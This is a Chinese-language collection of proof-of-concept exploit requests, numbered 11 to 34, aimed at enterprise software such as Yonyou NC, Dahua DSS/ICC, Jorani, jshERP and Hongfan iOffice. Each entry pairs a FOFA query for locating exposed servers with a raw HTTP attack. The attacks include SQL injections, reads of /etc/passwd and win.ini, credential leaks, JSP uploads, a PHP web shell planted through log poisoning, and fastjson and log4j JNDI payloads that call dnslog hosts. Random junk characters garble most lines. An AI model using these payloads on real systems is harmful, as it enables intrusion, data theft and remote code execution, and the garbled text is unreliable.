% n6 n$ w& U) h! \- G11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
7 E4 g, ^: M1 _' _FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台") d! L- g$ i: U% Y& J# h
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1) U+ ~4 x j, o; e
Host: 127.0.0.1
. T1 P2 _1 ]/ X L3 F. n2 H( oPragma: no-cache! |& o) _9 A4 d
Cache-Control: no-cache- ~+ a; \' T/ T N& z% R. D
Upgrade-Insecure-Requests: 1
+ P) `. x8 z$ j: x' `, W% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* R7 V% O9 G# W; l1 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' A" b0 S* ^ ^% k: A! s
Accept-Encoding: gzip, deflate
~! l$ v: ]) W* B1 h5 f. \Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
! V/ g! G R3 t0 i# N! H* |Connection: close
& \; m* [* p9 x. S* J
% H" Y; _+ }- D% I+ c* i3 W2 t! n# A2 X, a' s0 p
12. Jorani < 1.0.2 远程命令执行 w0 ?8 _3 S, V# `- n
FOFA:title="Jorani"
+ C9 A9 P1 m9 u( r; N第一步先拿到cookie0 V' m }5 W+ \! h9 S" o4 I
GET /session/login HTTP/1.1
8 H! @* g2 h5 c* WHost: 192.168.190.302 z0 C! s% g0 B2 W7 [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
T& r# O+ ?1 o* {Connection: close8 T" g" f3 i, B- B' d: w
Accept-Encoding: gzip
& {+ U9 K B) G. j3 {" B( P' v+ I7 k3 r5 Q6 X+ u: E/ A
6 w% j2 e( L0 l2 i3 I响应中csrf_cookie_jorani用于后续请求: n4 b, `7 O3 i
HTTP/1.1 200 OK
+ \4 _) u& b5 w. m+ K7 ]+ v- QConnection: close
i4 B) J/ e$ f1 s" B6 _0 ZCache-Control: no-store, no-cache, must-revalidate
5 i" l" u3 a, A' T2 ?1 ZContent-Type: text/html; charset=UTF-8
' k8 [" q- l3 C& d2 [$ s: w+ a% J/ sDate: Tue, 24 Oct 2023 09:34:28 GMT
( h5 m O3 j" j+ bExpires: Thu, 19 Nov 1981 08:52:00 GMT0 h4 P+ _% ?7 X' E, K+ J& W
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT7 u* m0 F3 b: K G
Pragma: no-cache; z) e& h6 \5 C0 w/ \
Server: Apache/2.4.54 (Debian) f/ e3 ? o3 G# N# {# K
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
* _+ r3 t2 ?* T2 h5 F9 VSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly- v# e0 {! o) k0 N% ]0 x+ z ~; B
Vary: Accept-Encoding
1 u4 d9 l: v- {3 [7 F* ^/ c, a- A
3 V( J0 Z+ D: d f% jPOST请求,执行函数并进行base64编码
2 ^) s* P' _4 V6 e! x- F+ y1 SPOST /session/login HTTP/1.1
. m2 w B, J+ j3 |+ V8 q: FHost: 192.168.190.30+ U4 C; D4 x8 Z* u9 m1 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 u# w% ]) S5 {, g+ m- e; wConnection: close, b( j1 G6 v4 L; H
Content-Length: 2529 e( Y/ z5 y' e, ]1 V
Content-Type: application/x-www-form-urlencoded
; a( O3 V3 p3 [9 H3 x4 N+ C/ u' X3 kCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ d5 z1 R% Z. LAccept-Encoding: gzip
' ?0 J4 x: s5 T: M* ]6 d& V
, M% m: N: Z" K, H& e: w8 T& c0 ?$ hcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor! }" ~% y% r; s" d ^, I" n
2 D9 f8 p- E$ V& T* W( f' k- I$ C o% C
8 o# V2 U; T# ]2 X2 l! v
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
! S: Q, c; S; T0 `* J" m! t& V' Q4 LGET /pages/view/log-2023-10-24 HTTP/1.1
' T/ Q. {% [- T i2 U) w. G. Q2 THost: 192.168.190.30* g0 i. D0 Z7 P# H9 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 F6 r* s6 r9 b& G L2 O2 bConnection: close9 q) Z& y: [% m$ m1 f& g4 X- y/ `
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
2 C* ^ p1 e5 {2 I* K- Z9 w. PK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=% v" ]: |# X! f9 i2 T
X-REQUESTED-WITH: XMLHttpRequest
1 k8 O5 Q& m4 ^$ f7 n; e$ B" VAccept-Encoding: gzip! T/ Z( `6 }# C
3 f) n) `% e7 g" ~+ X! s! M: @
4 z3 Z/ {" }2 w+ m
13. 红帆iOffice ioFileDown任意文件读取1 q& U( _5 H0 Y, ]; B" M
FOFA:app="红帆-ioffice"
# c* j- @) M/ ?; Y mGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
% n" x a2 o- G! EHost: x.x.x.x2 H' V) ?! K, p* y$ v* S% g0 O% @( X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' J0 u6 P, w" W; l/ T
Connection: close& T8 l9 M* I' |# \) u7 z
Accept: */*
1 B# K X& \4 A% J2 ^. tAccept-Encoding: gzip5 X% s6 I$ k% ?3 h% o: \
7 b: M& j& t3 {
8 j) A* @8 Y8 V6 b( S
14. 华夏ERP(jshERP)敏感信息泄露
3 e5 `8 X2 X% p+ r$ O, GFOFA:body="jshERP-boot"
0 j8 _) d) P3 k3 @1 G泄露内容包括用户名密码
+ I; Y' A! q7 ^" K! t5 u8 S% UGET /jshERP-boot/user/getAllList;.ico HTTP/1.18 K4 x4 ^( k. `' J
Host: x.x.x.x
9 T& n: s6 y# D: l$ LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36. p' l2 y! v: J$ I" _
Connection: close" G- W& v k3 F% j- m2 X6 O0 E
Accept: */*- Q, D7 C0 N6 y+ R$ Z# Y3 u# h
Accept-Language: en
& Y( n& z6 U# p4 T# x- ~- Q1 O+ HAccept-Encoding: gzip
. e" o% }" f6 Q. x1 n7 O+ q4 j( c" P; t* K( S
5 `: W. D, e U# n4 S, U
15. 华夏ERP getAllList信息泄露
; P" C8 G" V2 N/ @* @CVE-2024-0490$ Q! {/ E0 C, y9 [
FOFA:body="jshERP-boot"
2 F' m, v0 @4 m/ x# {泄露内容包括用户名密码
9 [) q1 n! J+ m. dGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.17 q7 \6 L& q: Q( h' D8 O
Host: 192.168.40.130:100% y9 M& j4 O9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.361 t4 {6 k; R r. G$ _! N3 Y
Connection: close
* B" m+ j. r3 q- x# ZAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
( l& q* S: {2 S2 A8 i/ U& C& TAccept-Language: en
9 l9 P+ e5 T0 }1 G3 \' Esec-ch-ua-platform: Windows
& e& C* @4 u1 |+ ?( U: D( ]Accept-Encoding: gzip( }; n, h9 ?! g& L* n, y g
1 h" b: y, G) J
C. }4 `) |0 n* b7 \8 W' b16. 红帆HFOffice医微云SQL注入) T6 e' \ w! r& h4 d6 k0 n
FOFA:title="HFOffice"
& k& H* C. a/ o( Z+ X" x# Jpoc中调用函数计算1234的md5值
8 o: B, ]: J+ o5 B1 o; p) jGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1! N# M; v p& M! T' W* U
Host: x.x.x.x
( U( c' v5 m! {! q3 p; V3 ~! N* XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 q" I* v5 {0 r" @/ K
Connection: close
! A/ N0 p2 t1 y) O: U R# K% l& cAccept: */*
! S) P( p9 v7 R( o$ G c+ LAccept-Language: en
4 e' T9 C6 f% NAccept-Encoding: gzip
0 P4 p! @$ z9 I* n2 d8 l
$ s' A4 Y9 l1 I0 ]0 z& u6 O7 T4 H& F$ w
17. 大华 DSS itcBulletin SQL 注入
& ?. k1 G% s$ k2 N7 U7 eFOFA:app="dahua-DSS"
+ k9 c' t9 Z9 a4 O+ FPOST /portal/services/itcBulletin?wsdl HTTP/1.1. U1 |2 N- W) ~) U& o! o. z9 V( C
Host: x.x.x.x7 b7 t: z* t; s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ \; S0 O z! |: `Connection: close, l6 x; u6 f$ \" K7 G3 N/ v
Content-Length: 345' u. p/ W' i( J# h
Accept-Encoding: gzip
/ t" _7 k! j) M6 C: e6 F: W r' }2 k6 \1 |1 `# o
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
6 u) _) ^) v3 g- C Y. z<s11:Body>
2 }! R+ R3 u; D3 P1 C <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
" ?5 G5 g/ S" r( m4 U! w4 \ <netMarkings>
+ B2 [6 n7 L! q ` (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=19 }* S4 V) t4 g. Y; N& T- Z$ y
</netMarkings>
7 `7 O/ G3 K8 r0 t+ f9 @6 p, A </ns1:deleteBulletin>; T: K7 P' K6 U! E. R
</s11:Body>/ {4 h P; X+ D& l+ G8 {' X( ^7 R& S
</s11:Envelope>1 P% S6 d2 k$ i' U* X3 i
. Q# D% w8 L) D0 T, i
# m" d( ^7 _7 M. N5 ]+ G F& h18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
$ @$ h( x# G7 b5 b0 cFOFA:app="dahua-DSS"2 {8 a0 w5 R: X4 E
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1: A1 N# Q* `' x+ O- l1 k
Host: your-ip
- [/ [: O' _: RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( i' ^% ~: J8 |+ c/ v" b
Accept-Encoding: gzip, deflate
% @) {3 m: J- G' I! NAccept: */*8 t) |% F0 C/ a6 K
Connection: keep-alive1 }3 s9 R5 j% n/ @/ `: @" k
* c! P/ `2 E u+ A9 {' M a
- S9 Z# D4 P' w; H
! k4 {# I5 h4 m% H- t( s19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 K1 D3 ]7 J6 K. G& r& V6 G% p7 FFOFA:app="dahua-DSS"9 I8 X. x$ w: W/ ~8 U
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1! E- H o! C* g6 z
Host:
, g% ~2 p8 D; m- b8 u1 v, ?User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- T8 I' ?* V5 K& D7 W/ g
Accept-Encoding: gzip, deflate
6 c% i2 b1 R! c3 a% XAccept: */*1 x7 Z8 A; y$ u! j
Connection: keep-alive
- ?6 ]. X# S" w8 r7 l5 H
7 R( n3 A' @. R9 {9 q/ D9 J" `5 w; g$ O% [& D5 U+ T- y' h0 F
20. 大华ICC智能物联综合管理平台任意文件读取
, v2 @) ~9 Q* m% M) p M ZFOFA:body="*客户端会小于800*"$ ^& T$ n+ B# C9 z
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 t2 `& W7 q' ]+ _+ x: t
Host: x.x.x.x
7 h' [7 F/ R5 ?7 |6 l: r7 [2 MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! O7 A, }4 _# E) x2 M7 R- Z
Connection: close2 `+ x3 U* x9 O$ C. W+ p1 r$ j
Accept: */*; n1 I4 X" E! v2 m. }* `
Accept-Language: en
- v3 V/ n9 {6 t3 }Accept-Encoding: gzip1 z; ]& {8 W: c( h2 c' j0 ?
* w% j2 h c1 v7 k( l' R' ?7 j* v; f" d% u" [# ?
21. 大华ICC智能物联综合管理平台random远程代码执行/ W& w d4 I2 z) N# {6 O
FOFA:icon_hash="-1935899595"8 c4 e! w+ r1 G; W& f' X
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.15 F/ p: E+ ?0 O/ t
Host: x.x.x.x0 L1 D9 N* j" n2 I3 N7 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 x# Q- {: N' h, c7 DContent-Length: 161
* W U& P( r ?6 N0 Q# GAccept-Encoding: gzip
! E/ [/ I( a5 Z3 ~* w, HConnection: close( G# `+ N0 F* b& d4 _1 [
Content-Type: application/json;charset=utf-8
5 v4 W) [/ m0 E6 d; R$ O
# x7 g G3 ]8 {0 ^. L; _4 U5 s6 q& U$ }{
8 Y0 P, W0 H6 P+ S"a":{
( } B$ e4 b7 X8 ^ "@type":"com.alibaba.fastjson.JSONObject",
4 f* I# c: i: p8 C4 D {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
3 R' O! D* W# \$ Z5 u }"") k5 U a: h8 q) a2 ]0 u
}9 O0 r+ T! I( D& T! A
5 C8 C' a0 i3 u- |% O, k2 b6 w
9 `2 J' w/ t* | W q7 Q: y! P22. 大华ICC智能物联综合管理平台 log4j远程代码执行/ w! |& _, l, ~, H! ?/ _- h
FOFA:icon_hash="-1935899595"6 j E* u9 i7 O( S3 F
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
+ v- ?2 R8 J- x2 i( U% H8 ZHost: your-ip# e- v5 p8 W% Q) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; T( B+ J- M9 {1 g- ^& JContent-Type: application/json;charset=utf-89 B9 X: b$ l0 `3 ~
- [& \0 p: `) j- ^
{5 a" m) a3 K, X" G3 Z7 s
"loginName":"${jndi:ldap://dnslog}"
# D' ]3 k' T7 m0 y}
! i% m( G) y0 ?. p @+ _9 R* M
" `/ [/ [# w2 Q" G
+ l; b* o$ S) E1 T7 ~. A; x; @, e& n0 L: B1 x6 m4 b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ e0 L, H" N0 j( ?! R/ w3 p- B! YFOFA:icon_hash="-1935899595"
- z" E' L" Z ]# F% J# G) GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# y- ~8 `7 \( \7 _$ \Host: your-ip
9 p& \1 z3 {: r) nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# [4 p1 ^ S) C) }0 p0 W$ HContent-Type: application/json;charset=utf-8
' c# u& q( G- o5 x) ]Accept-Encoding: gzip. D* b; `7 h, P* [
Connection: close4 F6 _ y) L* N3 b
2 n( Y0 Y# F) h) P{
# @) s1 M' j/ E8 f% g- [! M0 n "a":{3 O" q% N3 [' Y- } F; i# F
"@type":"com.alibaba.fastjson.JSONObject",: Y% |- m& t! d/ F+ x
{"@type":"java.net.URL","val":"http://DNSLOG"}
; J/ T' V1 T; ~6 @3 y }""
# i5 y7 f: s1 ~% H4 X9 n}# ~' ]4 R( x F3 f) V) {5 W( ~
2 ^ _8 _! i. X/ ]$ r4 O
( Y$ Z5 D+ W% r4 s( j7 d5 F
24. 用友NC 6.5 accept.jsp任意文件上传
- J0 J( L) r, t% {6 W+ AFOFA:icon_hash="1085941792"/ ~1 M( L% H6 W9 G
POST /aim/equipmap/accept.jsp HTTP/1.1
% p# w, \4 B# [6 V8 WHost: x.x.x.x
# f# U4 @8 |# v2 O( rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- t6 Y4 U% ?/ A
Connection: close
$ Z9 v# |" ~# aContent-Length: 449/ F' o4 [2 r* v; x/ Z9 c* v" [
Accept: */*
6 V$ Z2 s- H# h# eAccept-Encoding: gzip
( C& h: a# i1 w8 S. `Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 r3 ]* X+ t: \: L0 M x
- {- G& K' {% v8 z2 Z0 \" b1 P9 b-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
H6 z8 J9 f9 t6 s$ Q3 s( nContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"9 r9 ^7 Z. ^- f; G
Content-Type: text/plain
) v) Q. U8 P1 r3 l; n, h; U/ d) l% i9 W0 R `# E3 Q" N
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>' l- R9 T' @) O2 b8 {- r2 O: ^
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 u9 e4 {- w' @+ j+ c$ b2 h/ K
Content-Disposition: form-data; name="fname"( g, |7 u( X# V( ~
/ F0 l+ f, H f: J! H0 o\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp; P# t& @0 F& o: F }% e$ T+ H+ ]/ }. p
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--6 [; s- c% ^. W' U% Z0 s7 e
) ^7 P. z4 b* s: e" a- n
. s6 G# u2 A# ^25. 用友NC registerServlet JNDI 远程代码执行- }% B6 t3 E0 g6 g
FOFA:app="用友-UFIDA-NC"( J" B9 `! S: F1 K7 } t
POST /portal/registerServlet HTTP/1.1/ W, R2 s$ z4 O5 _
Host: your-ip- H! _- D6 E4 W5 M5 u8 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
# F# x) I. ]* F k9 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.97 K' q* h5 a5 O& C
Accept-Encoding: gzip, deflate
; `7 P7 e- K6 V1 CAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
+ d6 C4 Z4 L8 i( ^! J' `Content-Type: application/x-www-form-urlencoded
5 ?+ s* E# s/ I. @5 @/ R( n- }" j7 f# j) ^% y! H
type=1&dsname=ldap://dnslog
: Z* N% u+ Q6 C
! _; x; y2 T! |3 X' f' R. E" q4 f' Z+ I; J% y/ s6 Y0 ~
" o/ C0 y& @' [2 N$ j/ D! V$ w26. 用友NC linkVoucher SQL注入3 u( y0 C# W$ X) n7 V
FOFA:app="用友-UFIDA-NC"' s5 G: i; g W8 f$ O4 f: z
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 \7 Z. Y0 U! s; `- c3 z' f& sHost: your-ip
* Z8 k5 C! ]7 A9 P* EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 I' i, [3 v& A$ D6 c! o" u
Content-Type: application/x-www-form-urlencoded
+ x$ r4 _. |& T0 jAccept-Encoding: gzip, deflate3 W7 J8 v V) i5 z( Z
Accept: */*. r, V( h7 G8 Z* M+ q( Y
Connection: keep-alive5 H7 h- R# l, @: C# @+ Z: k
6 H, W; [4 N6 p% K: w2 K- v
& I1 F7 N, B! O* e! i4 j% Z27. 用友 NC showcontent SQL注入, Q$ _4 I4 b: K
FOFA:icon_hash="1085941792"
7 R {% B- N6 u- O. D& |GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
) [* |3 W) y* ? x0 v7 n9 kHost: your-ip
) J% g, N+ J$ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 g5 J9 f/ V+ e
Accept-Encoding: identity
$ ^. L/ A; r, `1 ^* N" b! XConnection: close
3 I4 G3 X# m9 {% F+ sContent-Type: text/xml; charset=utf-8& u8 ^! w$ z9 r" g/ q2 G
8 ~ S3 C# \! A! o# N: y- E' L2 I
, C$ s: w. V9 |* _* s9 ~# W* y! J, F28. 用友NC grouptemplet 任意文件上传
k, T3 \9 X: W e" A6 ? G) LFOFA:icon_hash="1085941792"
# F- m; B/ o5 u. b5 P# EPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.19 R. S/ E3 ~" E+ G, O, D u7 _( Y
Host: x.x.x.x/ O( j# Z5 S# u3 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
7 X4 R, m$ l- W7 }Connection: close
8 c, Y/ `) f6 r1 lContent-Length: 268
/ r; n; e! v7 J9 R& _7 U. B. R3 LContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk7 u+ m: x$ f+ G/ [- K$ w- q
Accept-Encoding: gzip
+ e* [) O8 q: e# p/ d8 i5 G0 ]2 Q; b: x& ]% s
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* A- f- L: p0 J
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"( { P' ? W3 H
Content-Type: application/octet-stream
& W! z; Y7 w+ Z8 d: A2 Q0 i+ q/ p0 P: l8 |
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
3 c8 t' E( M2 A# @0 u/ V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
7 W3 N( h* G& j! K1 y% e+ J2 ~" z# g* L( ?) y/ e. d2 d
5 R7 T c; N! Y. j1 H$ G# h9 J/uapim/static/pages/nc/head.jsp
/ E6 g: A2 F* k& D" J: c% r9 P: e! z$ I* y* D" e- x1 F. Z
29. 用友NC down/bill SQL注入2 `( p% j* M t
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"2 Z0 F+ j' G. d6 \5 j' x2 Q
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 c8 ?( X$ h( ?0 w3 t
Host: your-ip
5 x9 t: R- Z B2 H+ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; T- i3 |5 Z4 S% A: n9 ^& nContent-Type: application/x-www-form-urlencoded/ _; n2 G+ X4 r
Accept-Encoding: gzip, deflate
3 n+ k7 }- ?7 q' \Accept: */*
# E$ O! `2 f' S* v. G5 |1 r ~Connection: keep-alive
) x% {2 n, Q2 |/ I- I8 n+ P1 [* O& v! {* v4 E6 r# h
2 u2 Y9 v' F$ g0 q4 l: |
30. 用友NC importPml SQL注入5 W# ?) J9 Z1 c/ Z
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 f$ M# ]9 p, G! R; S( c
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.16 Q/ s7 [7 ]1 l3 s! e# ^
Host: your-ip
6 b' e e% G! \8 ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
5 _# H& Y, A$ o' W4 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; I/ u4 G. d' F0 {Connection: close
# T( n4 f2 O# S7 \& d, d. [$ C% E
/ F7 A: }% _! l b, Y------WebKitFormBoundaryH970hbttBhoCyj9V
$ a$ ~, M1 Y$ o/ x5 R' J: BContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
" x4 g% v+ V9 W% k7 KContent-Type: image/jpeg2 \ p* j" z- Z% _
------WebKitFormBoundaryH970hbttBhoCyj9V--$ s1 G, z' O. v8 G9 k& i" _- T
4 i2 K& ^3 o' y
6 C/ d% ]) i! ^$ k! R$ b7 I31. 用友NC runStateServlet SQL注入
( c; ?) @; q9 q; T4 |+ [4 ?version<=6.5
' i. L& d9 b1 Z2 PFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 c3 @ a: ^. h; g" x
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- _' `# ~- O7 M, r5 OHost: host g8 m( v+ N0 S! B5 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; t& g2 a0 A e+ d \& d, E" zContent-Type: application/x-www-form-urlencoded- I, K2 W4 C! j- ^
* u& J9 j6 d; n2 C+ |1 S6 ~+ W+ [$ U% t) X
32. 用友NC complainbilldetail SQL注入
5 w2 f- Q R5 Q4 u3 P7 g4 uversion= NC633、NC65+ ~9 F8 U# V4 i# P
FOFA:app="用友-UFIDA-NC"- [5 n) o# y1 P. G6 [
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ U3 S; C- k1 D5 F* HHost: your-ip
" K9 X5 }# D3 y6 h* }/ [8 K) m: D( NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 y) q* b$ t* N$ @& J% J! a$ ]
Content-Type: application/x-www-form-urlencoded. C+ r3 y% u1 o$ g8 c
Accept-Encoding: gzip, deflate; K( S/ S* y* h& B& w) ^; x# Y
Accept: */*
Q+ V9 [, r" }: q$ ?. M# SConnection: keep-alive
e. z7 }# f! y' R( J n: ^2 ]% l3 j6 Y; R
( B- y [8 e6 s/ c, ]
33. 用友NC downTax/download SQL注入5 \2 Z* K4 J5 |; b4 d2 A
version:NC6.5FOFA:app="用友-UFIDA-NC"
1 D$ h; I: |- M U0 [4 YGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
c+ N, a5 g- ]Host: your-ip
7 S/ I# `* M/ J3 B/ _1 U7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ i( v. U: M0 N0 ~0 F. CContent-Type: application/x-www-form-urlencoded% m O5 l+ f, s6 ~8 I9 J/ q8 j, W
Accept-Encoding: gzip, deflate
7 `. n% x# @& f7 AAccept: */*
4 w% s. r& u. A' P; c& ]Connection: keep-alive
# H4 e! j5 t* y% C1 T7 R/ G( |* `6 h% `0 O8 R
; g& l1 z- c d( U- g- E+ q$ B' Z0 U5 X34. 用友NC warningDetailInfo接口SQL注入
1 o5 A2 }( G- |4 CFOFA:app="用友-UFIDA-NC"( O5 F/ D( _ w d
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. t" O, q, C% v( C- xHost: your-ip
- H, [$ }9 z" SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 Y5 ?4 p4 V8 ~0 U0 m
Content-Type: application/x-www-form-urlencoded
8 T. b: ]6 q$ \: ^% gAccept-Encoding: gzip, deflate
7 h/ T, K5 f# p# aAccept: */*7 K6 B# A- a# H5 u& U" `
Connection: keep-alive
